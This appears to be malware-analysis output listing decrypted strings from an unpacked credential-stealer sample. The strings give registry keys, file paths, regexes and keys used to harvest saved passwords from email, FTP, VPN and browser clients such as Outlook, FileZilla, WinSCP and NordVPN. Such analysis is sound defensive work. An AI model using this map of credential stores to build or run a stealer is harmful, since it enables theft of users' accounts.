Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: str3
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: str2
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: blob0
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: password_value
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: IncrediMail
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: PopPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SmtpPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\IncrediMail\Identities\
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Accounts_New
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: PopPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SmtpPassword
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SmtpServer
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: EmailAddress
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Eudora
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: current
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SavePasswordText
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ReturnAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Falkon Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: profiles.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: profiles.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \browsedata.db
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: autofill
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ClawsMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Claws-mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \clawsrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \clawsrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passkey0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accountrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: smtp_server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: address
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \passwordstorerc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Flock Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: signons3.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: DynDns
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: t6KzXhCh
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: global
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account.
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account.
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: name
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Psi\profiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accounts.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accounts.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: OpenVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: auth-data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: entropy
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: USERPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: remote
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: remote
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: user.config
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \account.json
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FileZilla
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Server>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: CoreFTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: User
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Port
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WinSCP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HostName
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UserName
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PublicKeyFile
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PortNumber
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WinSCP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ABCDEF
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Flash FXP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: port
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: user
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: quick.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Sites.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTP Navigator
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: No Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: User
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmartFTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WS_FTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HOST
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PWD=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PWD=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FtpCommander
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;User=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Server=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Port=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Port=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;User=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Anonymous=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTPGetter
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTPGetter
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: The Bat!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \The Bat!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.CFN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.CFN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Becky!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: DataDir
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Folder.lst
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PassWd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Becky!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Outlook
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IMAP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3 Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HTTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IMAP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3 Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HTTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Mail App
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SchemaId
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pResourceElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pIdentityElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pPackageSid
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: syncpassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: mailoutgoing
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FoxMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Executable
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FoxmailPath
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Storage\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Storage\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.stg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.stg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPHost
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IncomingServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3Password
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Opera Mail
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: opera:
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: PocoMail
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: appdata
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Pocomail\accounts.ini
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Email
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: POPPass
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SMTPPass
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SMTP
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: eM Client
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: eM Client\accounts.dat
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: eM Client
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Accounts
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: "Username":"
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: "Secret":"
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: "ProviderName":"
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: o6806642kbM7c5
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Mailbird
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: SenderIdentities
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Accounts
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: \Mailbird\Store\Store.db
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Server_Host
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Accounts
Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack | String decryptor: Email
